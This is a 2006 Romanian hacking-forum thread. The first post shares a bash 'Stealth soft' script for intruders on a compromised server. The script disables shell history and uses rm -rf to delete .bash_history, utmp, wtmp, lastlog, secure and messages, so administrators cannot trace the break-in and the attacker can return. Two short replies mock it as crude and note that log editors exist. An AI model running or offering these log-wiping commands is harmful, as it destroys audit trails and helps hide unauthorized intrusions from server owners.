thazer Posted June 28, 2006 Report Share Posted June 28, 2006 Multi intra pe servere si uita sa stearga log-urile , sunt si eu unul din acei "multi" , stai intrii pe un root bine mersi , si poc dupa 2 zile bye server , cum .. pai log-uri ... ce face-m cu log-urile .. le sterge-m ce puii nostri , fara log-uri mici sanse ca admin-ul sa-si dea seama de unde a venit hacker-ul si modul de pentrare al serverului , si poate mai tarziu il mai hack-uiesti odata script-ul este facut de mine , scris in bash deci nu`i mare scofala .. btw negesita root , poate fi rulat si de user dar in acest caz se sterge doar listele apartinand userului respectivp.s.sterge toate log-urile , ruland scriptul cand esti inca logat te ascunde din last who w , in ciuda altor script-uri care te "ascund" unele strica si logarea in continuare .. eu l-am facut ca dupa ce s-a rulat , log-area sa fie in continuare posibila... prietenii stiu de ce a da si ink ceva scriptul e ver. light ;P#!/bin/bashecho "#####################"echo "# Stealth soft #"echo "#####################"echo "Unsetting Histfile&Histsave&Watch"unset HISTFILEunset HISTSAVEunset WATCHexport HISTFILE=/dev/nullecho "Done!"history -necho "Deleting Compromisign files"rm -rf .bash_historyrm -rf /var/run/utmprm -rf /var/run/wtmp -rm -rf /var/log/lastlogrm -rf /usr/adm/lastlogcd /var/runtouch utmpchmod 664 utmprm -rf .bash_historycd /var/log/rm -rf wtmprm -rf securerm -rf lastlogrm -rf messagesecho "Done!"touch messagesstouch wtmptouch securetouch lastlogecho "Deleting user history"cd /rootrm -rf .bash_historytouch .bash_historycdrm -rf .bash_historytouch .bash_historyecho "Done! All Ok!" Quote Link to comment Share on other sites More sharing options...
axxl2006 Posted July 19, 2006 Report Share Posted July 19, 2006 lool Cu siguranta ca adminul nu-si va da seama ca cineva a umblat in serverul lui. Puteai sa pui si tu numele de "Log deleter" :@ S-au inventat si editoarele wtmp, utmp, lastlog, etc Quote Link to comment Share on other sites More sharing options...
0x90 Posted July 19, 2006 Report Share Posted July 19, 2006 da, e foarte stealth Quote Link to comment Share on other sites More sharing options...